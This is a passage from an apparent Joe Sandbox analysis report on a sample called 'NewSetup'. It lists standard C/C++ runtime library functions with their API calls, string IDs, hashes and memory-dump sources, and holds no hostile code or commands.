                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 1b1cc376b8722a7410f92badde6d1e5632cf0fe800e3ad608a8fe9c3029ff68a
                                                                                                      • Instruction ID: cd2bbadc122df4013fdcc1c87199118a29cb737b0b0d74f0ac455bc5bed3e3d7
                                                                                                      • Opcode Fuzzy Hash: 1b1cc376b8722a7410f92badde6d1e5632cf0fe800e3ad608a8fe9c3029ff68a
                                                                                                      • Instruction Fuzzy Hash: 51012D36235B37FFE7251AF87C4D8262698E702B71720032BF61041DF0EF518C229941
                                                                                                      Function 0022B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0022B68D
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0022B906
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 2673424686-393685449
                                                                                                      • Opcode ID: dc24f95255ecae4609a00b26126cb44d26834d831c2df0a6d9ecac4089f8ee52
                                                                                                      • Instruction ID: 576066667541c776c60a9b8b351f643cc00d3caf5bf4745cd5c48d30d242a9fa
                                                                                                      • Opcode Fuzzy Hash: dc24f95255ecae4609a00b26126cb44d26834d831c2df0a6d9ecac4089f8ee52
                                                                                                      • Instruction Fuzzy Hash: 20B17B7182022AFBCF16DFE4E8819AEB7B9AF04310B14455AE8156B202D731D971DF92
                                                                                                      Function 0021BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021BF44
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021C028
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: 95b4e268f539b89adcac33be7d9e1e9b10e2d6cca9317031fe319dfb8cca43b0
                                                                                                      • Instruction ID: ac025a7262330f99c5cd20c22ea96b7598506f8dc96bfe04ccea1c7869760ff2
                                                                                                      • Opcode Fuzzy Hash: 95b4e268f539b89adcac33be7d9e1e9b10e2d6cca9317031fe319dfb8cca43b0
                                                                                                      • Instruction Fuzzy Hash: EF41CD74910206DFCF2ADF68C9459EDB7F4BF68300F58805DE449A7A42C734AAA5CF52
                                                                                                      Function 002255C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,456001D6,?,?,00000000,0023BE94,000000FF,?,00225685,00000002,?,00225721,00228396), ref: 002255F9
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022560B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,0023BE94,000000FF,?,00225685,00000002,?,00225721,00228396), ref: 0022562D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
                                                                                                      • Instruction ID: e48df7afeff1a3fe89048fa10e277669cfe8f50512d3b61ece97b5514aedd8d7
                                                                                                      • Opcode Fuzzy Hash: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
                                                                                                      • Instruction Fuzzy Hash: 2701D675A10629BFCB118F94EC0DBBEB7BCFB06B15F004526F811E2690DBB49910CA90
                                                                                                      Function 0022D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0022D76F
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0022D838
                                                                                                      • __freea.LIBCMT ref: 0022D89F
                                                                                                        • Part of subcall function 0022BF11: RtlAllocateHeap.NTDLL(00000000,0022DF35,?,?,0022DF35,00000220,?,00000000,?), ref: 0022BF43
                                                                                                      • __freea.LIBCMT ref: 0022D8B2
                                                                                                      • __freea.LIBCMT ref: 0022D8BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1423051803-0
                                                                                                      • Opcode ID: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
                                                                                                      • Instruction ID: f66d38fba59de9371627ce61650e4bd1dd66a616d4e01958824e5975b649c123
                                                                                                      • Opcode Fuzzy Hash: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
                                                                                                      • Instruction Fuzzy Hash: 1F519472620227BFEF219FE0AC81EBB77A9EF44710B150129FD04D6251E774DC729AA1
                                                                                                      Function 0021EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0021F005
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00218E38), ref: 0021F024
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F052
                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0AD
                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0C4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 66001078-0
                                                                                                      • Opcode ID: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
                                                                                                      • Instruction ID: ded5c8c19adc6dbb69184a5adb984cabf458e399fc10ada4332e8464ba347df2
                                                                                                      • Opcode Fuzzy Hash: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
                                                                                                      • Instruction Fuzzy Hash: 09418C7592060ADFCB60CF24C6849EAB3F4FF29310B20493AE46A97546D770E9E5CF51
                                                                                                      Function 0021D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021D4C9
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021D4D3
                                                                                                      • int.LIBCPMT ref: 0021D4EA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • codecvt.LIBCPMT ref: 0021D50D
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021D544
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                      • String ID:
                                                                                                      • API String ID: 3716348337-0
                                                                                                      • Opcode ID: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction ID: 2064acb6a62eb2eedff8fd5820831976e0aa0add34a34a94062527851a714108
                                                                                                      • Opcode Fuzzy Hash: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction Fuzzy Hash: 4E01C435921115DBCB06EB68D905AEE77F2AFA4324F740109E425AB292DF749EA0CF81
                                                                                                      Function 0021ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021ADDE
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021ADE9
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021AE57
                                                                                                        • Part of subcall function 0021ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0021ACC2
                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 0021AE04
                                                                                                      • _Yarn.LIBCPMT ref: 0021AE1A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1088826258-0
                                                                                                      • Opcode ID: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction ID: 5cd80c1a5c79fffd8f8034b7bb5249b234814f3e517d14be1b7414e4686a1489
                                                                                                      • Opcode Fuzzy Hash: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction Fuzzy Hash: CC01D8796221119BCB05EF24E9595BD77F5FF95750B14001AE40257382CF346E91CFC2
                                                                                                      Function 00230976 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00230A35
                                                                                                      • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00230A6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                                      • String ID: ,K$$utf8
                                                                                                      • API String ID: 943130320-825729930
                                                                                                      • Opcode ID: e3bceb87d1babc400da63888cb0a3956ff476a8566122b774c28ef1eb402633f
                                                                                                      • Instruction ID: 8a82edb2ae76104c622ebc57056dfcf025515d16b99ec51f207f74413bc61f7f
                                                                                                      • Opcode Fuzzy Hash: e3bceb87d1babc400da63888cb0a3956ff476a8566122b774c28ef1eb402633f
                                                                                                      • Instruction Fuzzy Hash: DD510BB1630306AAD724AF709CE1F7BB3A9EF05708F140425F64597181E6B0EDB08B75
                                                                                                      Function 002173E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 00217526
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00217561
                                                                                                        • Part of subcall function 0021AF37: CreateThreadpoolWork.KERNEL32(0021B060,00218A2A,00000000), ref: 0021AF46
                                                                                                        • Part of subcall function 0021AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0021AF53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                      • String ID: Fail to schedule the chore!$G.$
                                                                                                      • API String ID: 3683891980-3836090748
                                                                                                      • Opcode ID: 22d83ffd62bbe1ca32624d7355a896f4529d6008a9a13cdc84af89d3f5fa50e8
                                                                                                      • Instruction ID: 6e949584efe9c77130e3f4f3eac1f2fdc9c5fc37e94a8f9db5faf7a8870256a2
                                                                                                      • Opcode Fuzzy Hash: 22d83ffd62bbe1ca32624d7355a896f4529d6008a9a13cdc84af89d3f5fa50e8
                                                                                                      • Instruction Fuzzy Hash: 7051ECB0921208DFCB00DF94E848BEEBBB5FF48320F144129E8196B391D776A965CF91
                                                                                                      Function 00213E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213EC6
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214002
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021ABE5
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021AC09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: bad locale name$|=!e.$
                                                                                                      • API String ID: 2070049627-25103358
                                                                                                      • Opcode ID: 72403a7a91ee5ac74369439d856927e22a0dff61f77f4c33fb6de762ba128c25
                                                                                                      • Instruction ID: ebf30bae878db9478cae3f061f85f193581c308e6c1268190f1e127cb4ff703d
                                                                                                      • Opcode Fuzzy Hash: 72403a7a91ee5ac74369439d856927e22a0dff61f77f4c33fb6de762ba128c25
                                                                                                      • Instruction Fuzzy Hash: 7E41AFF0A10745ABEB10DF69D805B57BBF8BF14714F044229E40997B80E37AE568CBE1
                                                                                                      Function 0021B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021B809
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction ID: 660da78c084d33d138a3466321075fa54a4abce0f258bb6422d296b71977f096
                                                                                                      • Opcode Fuzzy Hash: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction Fuzzy Hash: FD21D6369202069FCF269F54D495AF9B7FCEF60720F15455EE401876D0D734ADE1CA80
                                                                                                      Function 0021F11D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                      • GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                      • CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                      • String ID: :%!
                                                                                                      • API String ID: 2551024706-1915189741
                                                                                                      • Opcode ID: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction ID: e2d135945a100e18932bc2f42e89c46316e32a59ffc80aea00b2d6fb74fcefc6
                                                                                                      • Opcode Fuzzy Hash: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction Fuzzy Hash: B1F05E71654115FFDB108F24DD0DA9A3AA4EB12770F240720F835EA1E0E771DE908680
                                                                                                      Function 0021ABC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
